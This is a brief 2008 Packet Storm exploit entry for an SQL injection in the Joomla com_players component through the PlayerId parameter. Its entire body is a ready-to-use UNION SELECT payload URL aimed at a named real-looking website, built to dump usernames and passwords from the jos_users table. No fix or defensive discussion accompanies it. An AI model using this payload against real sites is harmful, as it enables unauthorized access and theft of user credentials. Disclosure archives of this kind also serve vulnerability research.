joomlaplayers-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:67957
Type packetstorm
Reporter anonymous
Modified 2008-07-10T00:00:00

Description

                                        
                                            `Joomla Component com_players (PlayerId) SQL Injection Vulnerability  
  
Example:  
  
http://uks-zoliborz.home.pl/index.php?option=com_players&Itemid=35&PlayerId=-1+union+select+1,2,concat(username,char(58),password)KHG+from+jos_users--<http://uks-zoliborz.home.pl/index.php?option=com_players&Itemid=35&PlayerId=-1+union+select+1,2,concat%28username,char%2858%29,password%29KHG+from+jos_users-->  
`